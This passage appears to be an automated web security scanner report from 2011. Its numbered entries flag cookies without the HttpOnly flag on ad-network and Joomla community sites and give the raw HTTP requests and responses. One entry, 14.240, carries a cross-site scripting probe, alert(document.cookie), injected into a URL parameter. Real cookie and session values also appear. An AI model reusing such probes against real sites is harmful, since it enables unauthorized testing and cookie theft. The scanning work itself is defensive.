  • PREF=ID=d431de1ea54b0d62:TM=1295881314:LM=1295881314:S=NrIf36hJf5JjvkvE; expires=Wed, 23-Jan-2013 15:01:54 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:54 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d431de1ea54b0d62:TM=1295881314:LM=1295881314:S=NrIf36hJf5JjvkvE; expires=Wed, 23-Jan-2013 15:01:54 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

14.228. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=bs.serving-sys.com; path=/
  • A3=gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
  • B3=7lgH0000000001sG852G0000000003sS8cVQ0000000001sV83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
  • u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2150004&PluID=0&ord=1295907707715&rtu=-1 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=53705905654
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingCachedScripts/Res/Blank_1x1.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS8cVQ0000000001sV83xP0000000001sF7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 24-Apr-2011 17:21:02 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 24 Jan 2011 22:21:02 GMT
Connection: close


14.229. http://c7.zedo.com/OzoDB/cutils/R52_9/jsc/305/egc.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /OzoDB/cutils/R52_9/jsc/305/egc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,21,0;expires=Wed, 23 Feb 2011 22:30:29 GMT;path=/;domain=.zedo.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OzoDB/cutils/R52_9/jsc/305/egc.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; ZFFAbh=749B826,20|1483_749#365; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,21,0;expires=Wed, 23 Feb 2011 22:30:29 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1041103803 1040114911
Cache-Control: max-age=996206
Expires: Sat, 05 Feb 2011 11:13:55 GMT
Date: Mon, 24 Jan 2011 22:30:29 GMT
Connection: close



14.230. http://c7.zedo.com/bar/v16-401/c5/jsc/gl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • FFgeo=5386156;expires=Tue, 24 Jan 2012 21:54:47 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-401/c5/jsc/gl.js HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFgeo=5386156; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1; ZFFAbh=749B826,20|1483_749#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 24 Jan 2012 21:54:47 GMT;domain=.zedo.com;path=/;
ETag: "91bd5740-5d7-4988a5ba08d40"
Vary: Accept-Encoding
X-Varnish: 1882666809
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=283434
Expires: Fri, 28 Jan 2011 04:38:41 GMT
Date: Mon, 24 Jan 2011 21:54:47 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

14.231. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rw6qcLcmo_34070076.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 01:35:43 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 01:35:43 GMT
Cneonction: close
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Date: Tue, 25 Jan 2011 01:06:57 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1336

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUt
...[SNIP]...

14.232. http://click.linksynergy.com/fs-bin/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://click.linksynergy.com
Path:   /fs-bin/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • lsn_statp=PnziUhIAAACuZBF8o1XyYQ%3D%3D; Domain=.linksynergy.com; Expires=Sun, 19-Jan-2031 15:01:55 GMT; Path=/
  • lsn_qstring=Xy0hOcdtU4s%3A145238%3A; Domain=.linksynergy.com; Expires=Tue, 25-Jan-2011 15:01:55 GMT; Path=/
  • lsn_track=UmFuZG9tSVZr%2B5Qg95vOvRInoLj5bFWQpPhvmyUyQZxMl7BXvJRnSunPLcEDNpg8RczJ2bC7B6SGP9QTzTIiJg%3D%3D; Domain=.linksynergy.com; Expires=Thu, 21-Jan-2021 15:01:55 GMT; Path=/
  • lsclick_mid24808="2011-01-24 15:01:55.807|Xy0hOcdtU4s-DyfF4yfSMJkYwTSt3bjXEg"; Domain=.linksynergy.com; Expires=Wed, 23-Jan-2013 15:01:55 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs-bin/click?id=Xy0hOcdtU4s&offerid=145238.1405647&type=2&subid=0 HTTP/1.1
Host: click.linksynergy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=PnziUhIAAACuZBF8o1XyYQ%3D%3D; Domain=.linksynergy.com; Expires=Sun, 19-Jan-2031 15:01:55 GMT; Path=/
Set-Cookie: lsn_qstring=Xy0hOcdtU4s%3A145238%3A; Domain=.linksynergy.com; Expires=Tue, 25-Jan-2011 15:01:55 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVZr%2B5Qg95vOvRInoLj5bFWQpPhvmyUyQZxMl7BXvJRnSunPLcEDNpg8RczJ2bC7B6SGP9QTzTIiJg%3D%3D; Domain=.linksynergy.com; Expires=Thu, 21-Jan-2021 15:01:55 GMT; Path=/
Set-Cookie: lsclick_mid24808="2011-01-24 15:01:55.807|Xy0hOcdtU4s-DyfF4yfSMJkYwTSt3bjXEg"; Domain=.linksynergy.com; Expires=Wed, 23-Jan-2013 15:01:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 24 Jan 2011 15:01:55 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: http://memberservices.informit.com/affiliates/gateway.ashx?siteID=Xy0hOcdtU4s-DyfF4yfSMJkYwTSt3bjXEg&url=http%3A%2F%2Fwww.informit.com%2Fstore%2Fproduct.aspx%3Fisbn%3D0321704215
Content-Length: 0
Connection: close


14.233. http://code.google.com/p/swfobject/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=2a7ca615dc37f0d1:TM=1295908254:LM=1295908254:S=00p2bA3htJm-NcjW; expires=Wed, 23-Jan-2013 22:30:54 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:30:54 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=2a7ca615dc37f0d1:TM=1295908254:LM=1295908254:S=00p2bA3htJm-NcjW; expires=Wed, 23-Jan-2013 22:30:54 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

(function(){funct
...[SNIP]...

14.234. http://community.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 88b9e45a51b17bd9f961adad9aab4c54=04d74cf0b4f61e32b561da5cc9f02fc1; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: community.joomla.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.3.10.1295835652

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:20:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 88b9e45a51b17bd9f961adad9aab4c54=04d74cf0b4f61e32b561da5cc9f02fc1; path=/
Last-Modified: Mon, 24 Jan 2011 02:20:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 33586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...

14.235. http://community.joomla.org/showcase/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • e3f36b393f7b576bc345f1ba25fa2851=ff1c090dbcaab6cc278de2960e220011; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showcase/ HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff1c090dbcaab6cc278de2960e220011; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.236. http://community.joomla.org/showcase/how-to-submit-a-site.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/how-to-submit-a-site.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • e3f36b393f7b576bc345f1ba25fa2851=be510ddcd2bf15612a74f73f10f6bdfe; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showcase/how-to-submit-a-site.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=be510ddcd2bf15612a74f73f10f6bdfe; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.237. http://community.joomla.org/showcase/sites-of-the-month.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites-of-the-month.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • e3f36b393f7b576bc345f1ba25fa2851=ff4fc6ec86026a313be3c261f8519100; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showcase/sites-of-the-month.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff4fc6ec86026a313be3c261f8519100; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.238. http://community.joomla.org/showcase/sites/advsearch.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites/advsearch.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • e3f36b393f7b576bc345f1ba25fa2851=6cd3aab8711a0481615375ee027eb309; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showcase/sites/advsearch.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=6cd3aab8711a0481615375ee027eb309; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.239. http://community.joomla.org/showcase/sites/new.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites/new.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • e3f36b393f7b576bc345f1ba25fa2851=423eae15ca00d1e8cf624b675f042aa5; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showcase/sites/new.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=423eae15ca00d1e8cf624b675f042aa5; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.240. http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.parenthood.com
Path:   /kickapps/service/getWidgetSwf.kickAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • as=40337; Expires=Wed, 26-Jan-2011 02:23:02 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kickapps/service/getWidgetSwf.kickAction HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A; as=40337

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 25 Jan 2011 02:23:02 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 02:23:02 GMT; Path=/
Location: http://kickapps.yuku.com/kickFlash/KickShell.swf?referralUrl=http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1&widgetHost=kickapps.yuku.com&buildVersion=1.0.589
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 02:23:02 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8


14.241. http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://comunidadjoomla.org
Path:   /component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

Issue detail

